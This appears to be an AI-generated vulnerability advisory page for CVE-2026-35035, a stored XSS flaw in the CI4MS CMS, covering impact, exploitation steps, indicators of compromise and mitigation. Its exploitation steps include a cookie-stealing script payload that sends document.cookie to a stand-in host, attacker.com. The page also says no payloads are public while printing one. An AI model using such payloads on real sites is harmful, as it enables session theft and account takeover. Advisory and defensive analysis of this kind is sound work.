CVE-2026-35035: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-35035 is a Stored DOM Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in versions up to and including 0.31.1.0, where administrative configuration fields within System Settings – Company Information accept attacker-controlled input that is stored in the database and rendered without proper output encoding on public-facing pages such as the main landing page. The vulnerability was published on April 2, 2026, by the project maintainer and assigned CVE-2026-35035 on April 6, 2026. It carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, though alternate scoring sources report scores ranging from 7.2 to 9.0 (GitHub Advisory, CI4MS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting): the application stores user-supplied values from administrative Company Information fields in the database without sanitization, then renders them directly in public-facing frontend templates without output encoding. This constitutes a Stored (Persistent) DOM XSS pattern, where the malicious payload is injected once by an authenticated administrator and subsequently executed in the browsers of all visitors to the public landing page. Notably, the vulnerability does not trigger within the administrative dashboard itself — execution is limited to the public frontend. No concrete PoC payloads or reproduction steps have been publicly released beyond the advisory description (GitHub Advisory, CI4MS Advisory).

Impact

Successful exploitation enables full account takeover and privilege escalation for all user roles by executing malicious JavaScript in the browsers of any visitor to the public-facing landing page. An attacker with administrative access can inject payloads that steal session tokens, credentials, or other sensitive data from site visitors, potentially compromising all user accounts regardless of their privilege level. The scope change (S:C in CVSS) reflects that the impact extends beyond the vulnerable component to affect end users' browsers, with high confidentiality, integrity, and availability impact (GitHub Advisory, CI4MS Advisory).

Exploitability

No confirmed in-the-wild exploitation has been observed, and no functional proof-of-concept exploit code has been publicly released — the available advisory describes the vulnerability class and affected component but provides no actionable payloads or reproduction steps (CI4MS Advisory). Exploitation requires an authenticated attacker with at minimum low-level administrative privileges to access the System Settings – Company Information panel. The EPSS score is approximately 0.02% (0.000720), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and Qualys has added detection for it (GitHub Advisory).

Exploitation steps

  1. Gain Administrative Access: Obtain credentials for an account with access to the CI4MS administrative panel (e.g., through phishing, credential stuffing, or insider access), targeting instances running CI4MS version 0.31.1.0 or earlier.
  2. Navigate to System Settings: Log into the admin dashboard and navigate to System Settings – Company Information, which contains multiple configuration fields that are rendered on the public frontend.
  3. Inject XSS Payload: Enter a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a DOM-based blind XSS payload) into one or more Company Information fields such as company name, address, or contact details.
  4. Save Configuration: Submit the form to persist the payload in the database. The administrative dashboard itself will not execute the payload.
  5. Payload Delivery to Victims: Any user who visits the public-facing landing page will have the stored payload rendered and executed in their browser, enabling session token theft, credential harvesting, or account takeover.
  6. Achieve Account Takeover / Privilege Escalation: Use stolen session tokens or credentials to authenticate as higher-privileged users, achieving full platform compromise (GitHub Advisory, CI4MS Advisory).

Indicators of compromise

  • Logs: Web server access logs showing unusual or encoded content in HTTP responses for the public landing page; admin panel access logs showing modifications to System Settings – Company Information fields by unexpected accounts or at unusual times.
  • Database: Presence of JavaScript tags (<script>, <img onerror=, javascript:) or encoded equivalents in Company Information database fields (e.g., company name, address, phone).
  • Network: Outbound requests from victim browsers to unknown external domains immediately after visiting the landing page; DNS queries or HTTP requests to attacker-controlled infrastructure originating from site visitor sessions.
  • File System: No direct file system artifacts expected for this stored XSS, but review application logs for unexpected admin configuration changes.
  • Browser/Session: Reports from users of unexpected redirects, session invalidation, or unauthorized actions after visiting the site's main landing page (GitHub Advisory).

Mitigation and workarounds

The vulnerability is fixed in CI4MS version 0.31.2.0; all users should upgrade immediately (GitHub Advisory). As interim mitigations, administrators should implement strict input validation and output encoding for all Company Information fields, particularly those rendered on public-facing pages. Deploying a Content Security Policy (CSP) header can significantly reduce the impact of any XSS by restricting script execution sources. Access to the System Settings panel should be limited to the minimum necessary administrative accounts.

Community reactions

The vulnerability was reported by security researchers bugmithlegend and peeefour and published by the CI4MS maintainer bertugfahriozer (CI4MS Advisory). A brief mention appeared on Bluesky via the CVE tracking account shortly after publication. No significant broader media coverage, vendor statements beyond the advisory, or notable researcher commentary has been identified for this vulnerability.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management